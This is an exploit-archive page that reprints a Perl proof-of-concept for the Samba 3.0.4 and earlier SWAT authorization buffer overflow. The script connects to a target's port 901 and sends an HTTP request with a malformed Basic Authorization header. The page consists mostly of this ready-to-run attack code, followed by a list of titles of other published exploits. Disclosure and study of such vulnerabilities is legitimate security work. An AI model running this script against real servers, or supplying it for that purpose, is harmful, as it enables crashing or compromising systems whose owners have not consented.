exploits , vulnerabilities , articles , Samba <=3.0.4 SWAT Authorization Buffer Overflow Exploit

2004-07-22

Samba <=3.0.4 SWAT Authorization Buffer Overflow Exploit

#!/usr/bin/perl
# Samba 3.0.4 and prior's SWAT Authorization Buffer Overflow
# Created by Noam Rathaus of Beyond Security Ltd.
#

use IO::Socket;
use strict;

my $host = $ARGV[0];

my $remote = IO::Socket::INET->new ( Proto => "tcp",
PeerAddr => $host, 
PeerPort => "901" );

unless ($remote) { die "cannot connect to http daemon on $host"
}

print "connected\n";

$remote->autoflush(1);

my $http = "GET / HTTP/1.1\r
Host: $host:901\r
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7) Gecko/20040712

Firefox/0.9.1\r
Accept: text/xml\r
Accept-Language: en-us,en;q=0.5\r
Accept-Encoding: gzip,deflate\r
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r
Keep-Alive: 300\r
Connection: keep-alive\r
Authorization: Basic =\r
\r
";

print "HTTP: [$http]\n";
print $remote $http;
sleep(1);
print "Sent\n";

while (<$remote>)
{
 print $_;
}
print "\n";

close $remote;


securitydot.net - 2004-07-22

Exploits - newest 10 RSS | More

2007-06-15 56418 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 33610 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 41772 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 28895 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19405 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16414 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 19069 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16288 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33174 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 16940 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit